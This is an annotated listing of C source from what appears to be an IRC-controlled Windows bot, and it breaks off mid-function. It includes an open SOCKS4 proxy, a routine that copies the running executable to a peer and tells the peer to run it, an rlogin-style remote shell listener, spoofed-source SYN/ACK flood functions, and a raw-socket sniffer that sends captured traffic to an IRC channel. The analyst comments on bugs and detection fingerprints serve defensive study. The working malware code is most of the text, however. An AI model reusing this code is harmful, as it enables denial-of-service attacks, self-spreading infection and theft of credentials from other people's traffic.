 * Socks4ClientThread - per-connection handler of a SOCKS4 proxy.
 *
 * param points to a SOCKS4 request; the thread copies it and sets cgotinfo on
 * the caller's copy. The client socket is threads[cthreadnum].sock. The
 * handler waits up to 5 s for data, reads a SOCKS4HEADER, accepts only
 * version 4 with the CONNECT command, optionally compares the supplied
 * userid with socks4.userid, connects to the requested address and port,
 * answers with an 8-byte reply (GRANT, REJECT or REJECT_USERID) and then
 * relays both directions through TransferLoop().
 *
 * Analyst notes, read from the code below:
 *  - When socks4.userid is empty no check is made at all, so the listener is
 *    an open relay for anyone who can reach it. The userid check itself is a
 *    cleartext string comparison.
 *  - The header is read with a single recv(); a short read leaves part of hdr
 *    uninitialised, and hdr.userid is not guaranteed to be terminated before
 *    strcmp() and the %s log call.
 *  - memset(&hdr.userid, 0, 1024) hard-codes the field size. NOTE(review):
 *    SOCKS4HEADER is defined elsewhere; confirm userid is 1024 bytes.
 *  - Line breaks were lost in this listing: the text after the `// FIX ME`
 *    marker swallows the statements that follow it on the same physical line.
 */
DWORD WINAPI Socks4ClientThread(LPVOID param) { SOCKS4 socks4 = *((SOCKS4 *)param); SOCKS4 *socks4p = (SOCKS4 *)param; socks4p->cgotinfo = TRUE; int threadnum = socks4.cthreadnum; SOCKS4HEADER hdr; TIMEVAL timeout; timeout.tv_sec = 5; timeout.tv_usec = 0; fd_set fd; FD_ZERO(&fd); FD_SET(threads[threadnum].sock, &fd); if (fselect(0, &fd, NULL, NULL, &timeout) == 0) { fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } if (frecv(threads[threadnum].sock, (char *)&hdr, sizeof(hdr), 0) <= 0) { fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } if (hdr.vn != 4 || hdr.cd != SOCKS4_CONNECT) { fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } // FIX ME: do a userid (hdr.userid) check here if you wish to use simple auth (needs testing) if (socks4.userid[0] != '\0') { if (strcmp(hdr.userid, socks4.userid) != 0) { addlogv("[SOCKS4]: Authentication failed. Remote userid: %s != %s.", hdr.userid, socks4.userid); hdr.vn = 0; hdr.cd = SOCKS4_REJECT_USERID; memset(&hdr.userid, 0, 1024); fsend(threads[threadnum].sock, (char *)&hdr, 8, 0); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } } SOCKADDR_IN tsin; memset(&tsin, 0, sizeof(tsin)); tsin.sin_family = AF_INET; tsin.sin_port = hdr.destport; tsin.sin_addr.s_addr = hdr.destaddr; SOCKET tsock; if ((tsock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { addlogv("[SOCKS4]: Error: Failed to open socket(), returned: <%d>.", fWSAGetLastError()); hdr.vn = 0; hdr.cd = SOCKS4_REJECT; memset(&hdr.userid, 0, 1024); fsend(threads[threadnum].sock, (char *)&hdr, 8, 0); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } if (fconnect(tsock, (LPSOCKADDR)&tsin, sizeof(tsin)) == SOCKET_ERROR) { addlogv("[SOCKS4]: Error: Failed to connect to target, returned: <%d>.", fWSAGetLastError()); hdr.vn = 0; hdr.cd = SOCKS4_REJECT; memset(&hdr.userid, 0, 1024); fsend(threads[threadnum].sock, (char 
*)&hdr, 8, 0); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } hdr.vn = 0; hdr.cd = SOCKS4_GRANT; memset(&hdr.userid, 0, 1024); fsend(threads[threadnum].sock, (char *)&hdr, 8, 0); TransferLoop(tsock, threads[threadnum].sock); fclosesocket(tsock); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); }
/*
 * KUANG - copy the running executable to a peer over an already-connected
 * socket using the K2 message layout, then ask the peer to run it.
 *
 * Flow as written: pick a name of four random lowercase letters and build
 * "c:\<name>.exe"; switch the socket to blocking mode; wait for the peer via
 * KUANG_Reciev(); send a K2_UPLOAD_FILE message carrying the file size and
 * remote name; stream the module file in chunks of up to 1024 bytes; send
 * K2_RUN_FILE with the same name; send K2_QUIT. Returns 1 on success and 0
 * after closing the socket on failure. k2_buffer and k2_msg are globals
 * defined elsewhere.
 *
 * Analyst notes, read from the code below:
 *  - The dropped file is always "c:\" + four lowercase letters + ".exe", a
 *    simple pattern for file-creation monitoring on a receiving host.
 *  - randFile has 5 elements and the loop leaves x at 4, so
 *    randFile[x+1] = '\0' writes index 5, one past the array. The string is
 *    still terminated because of the earlier memset().
 *  - sprintf(k2_msg->bdata, rFile) uses a non-literal format string.
 *  - testfile is not closed on goto end paths taken after CreateFile()
 *    succeeded; ReadFile() and most fsend() results are unchecked. A send
 *    error inside the loop only breaks out of it, and the run request is
 *    still attempted.
 *  - Line breaks were lost in this listing: text after each `//` marker
 *    swallows the statements that follow it on the same physical line.
 */
int KUANG(SOCKET sock) { HANDLE testfile; char rBuffer[1024], thisfilename[MAX_PATH], randFile[5], rFile[15]; unsigned int Fsize, move; int x; DWORD mode = 0; memset(rFile,0,sizeof(rFile)); memset(randFile,0,sizeof(randFile)); srand(GetTickCount()); for (x=0;x < 4;x++) randFile[x] = (char)((rand()%26)+97); randFile[x+1] = '\0'; sprintf(rFile,"c:\\%s.exe",randFile); fioctlsocket(sock,FIONBIO,&mode); //set the socket back to blocking if (KUANG_Reciev(sock) == -1) goto end; memset(k2_buffer,0,sizeof(k2_buffer)); GetModuleFileName(NULL,thisfilename,sizeof(thisfilename)); testfile = CreateFile(thisfilename,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0); if (testfile == INVALID_HANDLE_VALUE) goto end; Fsize = GetFileSize(testfile,NULL); k2_msg->command=K2_UPLOAD_FILE; k2_msg->param=Fsize; strcpy(k2_msg->sdata,rFile); //strcpy(k2_msg->bdata,rFile); //CloseHandle(testfile); fsend(sock,k2_buffer,1024, 0); if (KUANG_Reciev(sock) == -1) goto end; while (Fsize) { unsigned int Fsend = 1024; memset(rBuffer,0,sizeof(rBuffer)); if (Fsend>Fsize) Fsend=Fsize; move = 0-Fsize; SetFilePointer(testfile, move, NULL, FILE_END); ReadFile(testfile, rBuffer, Fsend, &mode, NULL); int bytes_sent = fsend(sock, rBuffer, Fsend, 0); if (bytes_sent == SOCKET_ERROR) { if (fWSAGetLastError() != WSAEWOULDBLOCK) break; else bytes_sent = 0; } Fsize = Fsize - bytes_sent; } if (KUANG_Reciev(sock) == -1) goto end; if (testfile != INVALID_HANDLE_VALUE) CloseHandle(testfile); memset(k2_buffer,0,sizeof(k2_buffer)); k2_msg->command=K2_RUN_FILE; sprintf(k2_msg->bdata,rFile); fsend(sock,k2_buffer ,1024, 0); if (KUANG_Reciev(sock) == -1) goto end; memset(k2_buffer,0,sizeof(k2_buffer)); k2_msg->command=K2_QUIT; fsend(sock,k2_buffer ,4, 0); return 1; end:; fclosesocket(sock); return 0; }
/*
 * RlogindClientThread - per-connection handler of an rlogin-style remote
 * shell service.
 *
 * param points to an RLOGIND request; the thread copies it and sets gotinfo
 * on the caller's copy. The client socket is threads[cthreadnum].sock. The
 * handler waits up to 10 s for data, reads one byte, then three strings via
 * GetStr() (remote user, local user, terminal type), resolves the peer
 * address to a host name, sends a single zero byte and, unless InsecureFlag
 * is set, calls CheckLogin(). On success it logs the login, runs the session
 * with SessionRun() and logs the logout.
 *
 * Analyst notes, read from the code below:
 *  - Access control rests on a user name supplied by the client plus a host
 *    name from reverse DNS, both controlled by the connecting party; with
 *    InsecureFlag set there is no check at all.
 *  - strcpy(HostName, HostEnt->h_name) copies a resolver-supplied name into a
 *    100-byte stack buffer with no length check, so a long PTR answer
 *    overflows it. sprintf(HostName, finet_ntoa(...)) uses a non-literal
 *    format string.
 *  - None of the frecv() results are checked. NOTE(review): GetStr() is
 *    defined elsewhere; confirm it bounds and terminates its output.
 *  - A string literal is split across physical lines in this listing.
 */
DWORD WINAPI RlogindClientThread(LPVOID param) { RLOGIND rlogind = *((RLOGIND *)param); RLOGIND *rloginds = (RLOGIND *)param; rloginds->gotinfo = TRUE; int threadnum=rlogind.cthreadnum; char LocalUser[16], RemoteUser[16], TerminalType[64], HostName[100], Buffer[16]; LPHOSTENT HostEnt; SOCKADDR_IN csin; TIMEVAL timeout; timeout.tv_sec = 10; timeout.tv_usec = 0; fd_set fd; FD_ZERO(&fd); FD_SET(threads[threadnum].sock, &fd); if (fselect(0, &fd, NULL, NULL, &timeout) == 0) { fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } frecv(threads[threadnum].sock, (char *)&Buffer, 1, 0); GetStr(threads[threadnum].sock, RemoteUser, sizeof(RemoteUser)); GetStr(threads[threadnum].sock, LocalUser, sizeof(LocalUser)); GetStr(threads[threadnum].sock, TerminalType, sizeof(TerminalType)); int csin_len = sizeof(csin); if (fgetpeername(threads[threadnum].sock, (LPSOCKADDR)&csin, &csin_len) != 0) { addlogv("[RLOGIND]: Error: getpeername(): <%d>.", fWSAGetLastError()); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } if ((HostEnt = fgethostbyaddr((char *)&csin.sin_addr, sizeof(csin.sin_addr), PF_INET)) == NULL) sprintf(HostName, finet_ntoa(csin.sin_addr)); else strcpy(HostName, HostEnt->h_name); frecv(threads[threadnum].sock, (char *)Buffer, sizeof(Buffer), 0); fsend(threads[threadnum].sock, "", 1, 0); if (!InsecureFlag && !CheckLogin(RemoteUser,HostName,rlogind.username,csin.sin_addr.s_addr)) { fsend(threads[threadnum].sock, "PERMISSION DENIED.", sizeof("PERMISSION DENIED."), 0); fshutdown(threads[threadnum].sock,SD_BOTH); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } addlogv("[RLOGIND]: User logged in: <%s@%s>.", RemoteUser, HostName); if (!SessionRun(threadnum)) { addlogv("[RLOGIND]: Error: SessionRun(): <%d>.", GetLastError()); fshutdown(threads[threadnum].sock,SD_BOTH); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(1); } addlogv("[RLOGIND]: User logged out: 
<%s@%s>.", RemoteUser, HostName); fshutdown(threads[threadnum].sock,SD_BOTH); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); }
/*
 * RlogindThread - listener thread of the rlogin-style service.
 *
 * param points to an RLOGIND request; the thread copies it and sets gotinfo
 * on the caller's copy. It calls WSAStartup(2.2), installs CtrlHandler as a
 * console control handler, binds rlogind.port on INADDR_ANY and listens with
 * SOMAXCONN. For every accepted connection it enables SO_KEEPALIVE,
 * registers a thread-table entry with addthread(), starts
 * RlogindClientThread with a pointer to its local rlogind copy and spins in
 * 50 ms sleeps until that thread sets gotinfo. Whatever ends the loop, the
 * routine then logs "server failed", reports to IRC unless silent, and
 * cleans up.
 *
 * Analyst notes, read from the code below:
 *  - The listener accepts from any address on rlogind.port, so an unexpected
 *    TCP listener on the host is the indicator to look for; "[RLOGIND]:" is
 *    the prefix of every log line this service writes.
 *  - fsetsockopt() is given `flag` (value TRUE) as the option length instead
 *    of sizeof(flag). When the call fails the accepted socket is neither
 *    served nor closed.
 *  - The client thread receives the address of a stack variable and the
 *    hand-off relies on a plain (non-atomic) gotinfo flag polled in a loop.
 *  - csock is closed after the loop even when no connection was ever
 *    accepted, in which case it is uninitialised.
 *  - The CreateThread() result is assigned inside the if condition.
 */
DWORD WINAPI RlogindThread(LPVOID param) { RLOGIND rlogind = *((RLOGIND *)param); RLOGIND *rloginds = (RLOGIND *)param; rloginds->gotinfo = TRUE; char sendbuf[IRCLINE]; int csin_len, Err; unsigned long mode = 1; WSADATA WSAData; SECURITY_ATTRIBUTES SecurityAttributes; DWORD id; if ((Err = fWSAStartup(MAKEWORD(2,2), &WSAData)) != 0) { addlogv("[RLOGIND]: Error: WSAStartup(): <%d>.", Err); clearthread(rlogind.threadnum); ExitThread(1); } if (!SetConsoleCtrlHandler((PHANDLER_ROUTINE)&CtrlHandler, TRUE)) { addlogv("[RLOGIND]: Failed to install control-C handler, error: <%d>.", GetLastError()); fWSACleanup(); clearthread(rlogind.threadnum); ExitThread(1); } SOCKET ssock, csock; SOCKADDR_IN csin, ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(rlogind.port); ssin.sin_addr.s_addr = INADDR_ANY; if ((ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { threads[rlogind.threadnum].sock = ssock; if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) { if (flisten(ssock, SOMAXCONN) == 0) { SecurityAttributes.nLength = sizeof(SecurityAttributes); SecurityAttributes.lpSecurityDescriptor = NULL; SecurityAttributes.bInheritHandle = FALSE; addlog("[RLOGIND]: Ready and waiting for incoming connections."); BOOL flag = TRUE; while (1) { csin_len = sizeof(csin); if ((csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET) break; if (fsetsockopt(csock, SOL_SOCKET, SO_KEEPALIVE,(char *)&flag,flag) != SOCKET_ERROR) { rlogind.gotinfo = FALSE; sprintf(sendbuf,"[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), fntohs(csin.sin_port), rlogind.threadnum); addlog(sendbuf); rlogind.cthreadnum = addthread(sendbuf,RLOGIN_THREAD,csock); threads[rlogind.cthreadnum].parent = rlogind.threadnum; if (threads[rlogind.cthreadnum].tHandle = CreateThread(&SecurityAttributes,0,&RlogindClientThread,(LPVOID)&rlogind,0,&id)) { while (rlogind.gotinfo == FALSE) Sleep(50); } else { 
addlogv("[RLOGIND]: Failed to start client thread, error: <%d>.", GetLastError()); break; } } } } } } sprintf(sendbuf, "[RLOGIND]: Error: server failed, returned: <%d>.", fWSAGetLastError()); if (!rlogind.silent) irc_privmsg(rlogind.sock, rlogind.chan, sendbuf, rlogind.notice); addlog(sendbuf); fclosesocket(csock); fclosesocket(ssock); fWSACleanup(); clearthread(rlogind.threadnum); ExitThread(0); }
/*
 * SendDDOS - emit hand-built TCP packets at TargetIP:TargetPort for `len`
 * seconds and return the number of bytes handed to sendto().
 *
 * Opens an overlapped raw socket (IPPROTO_RAW) with IP_HDRINCL. Type selects
 * the TCP flags: "ddos.syn" sets SYN, "ddos.ack" sets ACK, "ddos.random"
 * picks one of the two per call. Each loop pass sets a new source port and
 * sequence value, takes the source address from SpoofingIP and increments
 * it, recomputes both checksums through a pseudo-header and sends
 * sizeof(ipHeader)+sizeof(tcpHeader) bytes. The loop ends when
 * QueryPerformanceCounter() passes the computed halt time. Returns FALSE (0)
 * when setup fails and 0 after a send error, so neither is distinguishable
 * from "nothing sent".
 *
 * Analyst notes, read from the code below:
 *  - Constant fields make a practical filter fingerprint: IP ident 1,
 *    TTL 128, window 16384, source port in 1000..2000, and source addresses
 *    that increase by one per packet.
 *  - Source addresses are forged; source-address validation on egress
 *    (BCP 38) drops them, and SYN cookies on the receiving side limit the
 *    half-open-queue exhaustion that the embedded comment describes.
 *  - For any other Type value tcpHeader.flags and ack_seq are sent
 *    uninitialised.
 *  - tcpHeader.seq is filled through fhtons() of a value cast to unsigned
 *    short, so only 16 bits of it vary.
 *  - addr_in is not zeroed before use; (unsigned short)rand()%1025 applies
 *    the cast before the modulo.
 *  - The embedded block comment is split across physical lines in this
 *    listing.
 */
long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len) { WSADATA WSAData; SOCKET sock; SOCKADDR_IN addr_in; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; LARGE_INTEGER freq, halt_time, cur; char szSendBuf[60]={0},buf[64]; int rect; if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0) return FALSE; if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) { fWSACleanup(); return FALSE; } BOOL flag=TRUE; if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { fclosesocket(sock); fWSACleanup(); return FALSE; } addr_in.sin_family=AF_INET; addr_in.sin_port=fhtons((unsigned short)TargetPort); addr_in.sin_addr.s_addr=TargetIP; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.destIP=TargetIP; tcpHeader.dport=fhtons((unsigned short)TargetPort); tcpHeader.sport=fhtons((unsigned short)rand()%1025); tcpHeader.seq=fhtonl(0x12345678); /* A SYN attack simply smash its target up with TCP SYN packets. Each SYN packet needs a SYN-ACK response and forces the server to wait for the good ACK in reply. Of course, we just never gives the ACK, since we use a bad IP address (spoof) there's no chance of an ACK returning. This quickly kills a server as it tries to send out SYN-ACKs while waiting for ACKs. 
When the SYN-ACK queues fill up, the server can no longer take any incoming SYNs, and that's the end of that server until the attack is cleared up.*/ if (strcmp(Type,"ddos.syn") == 0) { tcpHeader.ack_seq=0; tcpHeader.flags=SYN; } else if (strcmp(Type,"ddos.ack") == 0) { tcpHeader.ack_seq=0; tcpHeader.flags=ACK; } else if (strcmp(Type,"ddos.random") == 0) { tcpHeader.ack_seq=rand()%3; if (rand()%2 == 0) tcpHeader.flags=SYN; else tcpHeader.flags=ACK; } tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.window=fhtons(16384); tcpHeader.urg_ptr=0; long total = 0; QueryPerformanceFrequency(&freq); QueryPerformanceCounter(&cur); halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart; while(TRUE) { tcpHeader.checksum=0; tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000)); tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand())); ipHeader.sourceIP=fhtonl(SpoofingIP++); psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons(sizeof(tcpHeader)); psdHeader.saddr=ipHeader.sourceIP; memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in)); if (rect==SOCKET_ERROR) { sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError()); addlog(buf); fclosesocket(sock); fWSACleanup(); return 0; } total += rect; QueryPerformanceCounter(&cur); if (cur.QuadPart >= halt_time.QuadPart) break; } fclosesocket(sock); fWSACleanup(); return (total); }
/*
 * SendSyn - emit hand-built TCP SYN packets at TargetIP:TargetPort for `len`
 * seconds and return the number of bytes handed to sendto().
 *
 * Opens an overlapped raw socket (IPPROTO_RAW) with IP_HDRINCL and zeroes the
 * destination sockaddr. tcpHeader.flags is fixed at 2 (SYN). Each loop pass
 * sets a new source port and sequence value, takes the source address from
 * SpoofingIP and increments it, recomputes both checksums through a
 * pseudo-header and sends sizeof(ipHeader)+sizeof(tcpHeader) bytes. The loop
 * ends when QueryPerformanceCounter() passes the computed halt time. Returns
 * FALSE (0) when setup fails and 0 after a send error, so neither is
 * distinguishable from "nothing sent".
 *
 * Analyst notes, read from the code below:
 *  - Constant fields make a practical filter fingerprint: IP ident 1,
 *    TTL 128, window 16384, source port in 1000..2000, and source addresses
 *    that increase by one per packet.
 *  - Source addresses are forged; source-address validation on egress
 *    (BCP 38) drops them, and SYN cookies on the receiving side limit
 *    half-open-queue exhaustion.
 *  - tcpHeader.seq is filled through fhtons() of a value cast to unsigned
 *    short, so only 16 bits of it vary.
 *  - A statement is split across physical lines in this listing.
 */
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len) { IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; LARGE_INTEGER freq, halt_time, cur; char szSendBuf[60]={0},buf[64]; int rect; WSADATA WSAData; if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0) return FALSE; SOCKET sock; if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) { fWSACleanup(); return FALSE; } BOOL flag=TRUE; if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { fclosesocket(sock); fWSACleanup(); return FALSE; } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(TargetPort); ssin.sin_addr.s_addr=TargetIP; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.destIP=TargetIP; tcpHeader.dport=fhtons(TargetPort); tcpHeader.ack_seq=0; tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.flags=2; tcpHeader.window=fhtons(16384); tcpHeader.urg_ptr=0; long total = 0; QueryPerformanceFrequency(&freq); QueryPerformanceCounter(&cur); halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart; while (1) { tcpHeader.checksum=0; tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000)); tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand())); ipHeader.sourceIP=fhtonl(SpoofingIP++); psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons(sizeof(tcpHeader)); psdHeader.saddr=ipHeader.sourceIP; memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), 
&tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin)); if (rect==SOCKET_ERROR) { sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError()); addlog(buf); fclosesocket(sock); fWSACleanup(); return 0; } total += rect; QueryPerformanceCounter(&cur); if (cur.QuadPart >= halt_time.QuadPart) break; } fclosesocket(sock); fWSACleanup(); return (total); }
/*
 * SnifferThread - thread entry that puts a raw socket into receive-all mode
 * on the host's first resolved address, inspects TCP payloads with the
 * IsSuspicious*() classifiers and reports matches to an IRC channel.
 *
 * Analyst summary (traits readable from this function):
 *   - host indicator: a raw AF_INET/IPPROTO_IP socket bound to the local
 *     address followed by WSAIoctl(SIO_RCVALL) with value 1;
 *   - network indicator: outbound IRC messages carrying the literal tags
 *     "SNIFFER" and "Bot sniff" / "IRC sniff" / "FTP sniff" / "HTTP sniff" /
 *     "VULN sniff" followed by quoted source/destination endpoints and the
 *     captured payload text;
 *   - traffic with source or destination port 110 or 25 is skipped; the
 *     Bot/IRC/FTP classifiers are additionally skipped for port 80.
 *
 * param: pointer to a SNIFFER structure owned by the caller. It is copied
 * into a local and gotinfo is then set on the caller's copy (presumably the
 * signal that the parameters have been taken over - confirm in the caller).
 *
 * Returns: NULL (0) if the raw socket cannot be created; the bind and ioctl
 * failure paths end the thread through ExitThread(0). The receive loop has
 * no break, so the statements after it are not reached as written.
 *
 * IsSuspiciousBot/IRC/FTP/HTTP/VULN, to_in_addr, irc_privmsg, addlog and
 * clearthread are defined outside this view.
 */
DWORD WINAPI SnifferThread(LPVOID param)
{
    SNIFFER sniff = *((SNIFFER *)param);
    SNIFFER *sniffs = (SNIFFER *)param;
    sniffs->gotinfo = TRUE;
    char sendbuf[IRCLINE];
    int sock;
    sockaddr_in addr_in;
    hostent *hEnt;
    IPHEADER *ipHeader;
    tcp_hdr_sniffer *tcpHeader;
    char *szPacket;
    char szName[255]={0};
    unsigned long lLocalIp;
    addr_in.sin_family=AF_INET;
    addr_in.sin_port=0;
    addr_in.sin_addr.s_addr=0;
    /* Resolve the machine's own name and take the first address returned. */
    fgethostname(szName, sizeof(szName));
    hEnt=fgethostbyname(szName);
    memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length);
    addr_in.sin_addr.s_addr=lLocalIp;
    sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP);
    if(sock==INVALID_SOCKET)
        return NULL;
    if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) {
        sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError());
        if (!sniff.silent)
            irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
        addlog(sendbuf);
        fclosesocket(sock);
        clearthread(sniff.threadnum);
        ExitThread(0);
    }
    int optval=1;
    DWORD dwBytesRet;
    /* SIO_RCVALL with a non-zero value asks the stack to deliver all IPv4
       packets seen on the bound interface to this socket. */
    if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR) {
        sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError());
        if (!sniff.silent)
            irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
        addlog(sendbuf);
        fclosesocket(sock);
        clearthread(sniff.threadnum);
        ExitThread(0);
    }
    char szRecvBuf[65535];
    /* The IP header view aliases the start of the receive buffer. */
    ipHeader=(IPHEADER*)szRecvBuf;
    int iRead;
    while(1) {
        // Zero the buffer so the payload scan below stops at the end of the packet data
        memset(szRecvBuf, 0, sizeof(szRecvBuf));
        iRead=0;
        // Read one raw packet; the return value is stored but not examined
        iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0);
        // Only protocol number 6 (TCP) is processed
        if(ipHeader->proto==6) {
            /* TCP header is taken at a fixed offset of sizeof(*ipHeader);
               the IP header-length field is not consulted. */
            tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader));
            int iSrcPort, iDestPort;
            char szSrcHost[2048], szDestHost[2048];
            iSrcPort=ntohs(tcpHeader->th_sport);
            iDestPort=ntohs(tcpHeader->th_dport);
            /* Ports 110 and 25 (the POP3 and SMTP assignments) are excluded. */
            if(iSrcPort !=110 && iSrcPort!=25 && iDestPort !=110 && iDestPort!=25) {
                sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP)));
                sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP)));
                /* Payload is likewise taken at a fixed offset and then
                   handled as a NUL-terminated string. */
                szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader));
                /* Flatten CR/LF to spaces so the text fits on one IRC line. */
                for(int i=0; i<(int)strlen(szPacket); i++) {
                    if(szPacket[i]=='\r')
                        szPacket[i]='\x20';
                    if(szPacket[i]=='\n')
                        szPacket[i]='\x20';
                }
                /* First matching classifier wins; each match is formatted
                   with endpoints and payload and sent to sniff.chan unless
                   the silent flag is set. */
                if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket)) {
                    _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
                    if (!sniff.silent)
                        irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
                }
                else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket)) {
                    _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
                    if (!sniff.silent)
                        irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
                }
                else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket)) {
                    _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
                    if (!sniff.silent)
                        irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
                }
                else if(IsSuspiciousHTTP(szPacket)) {
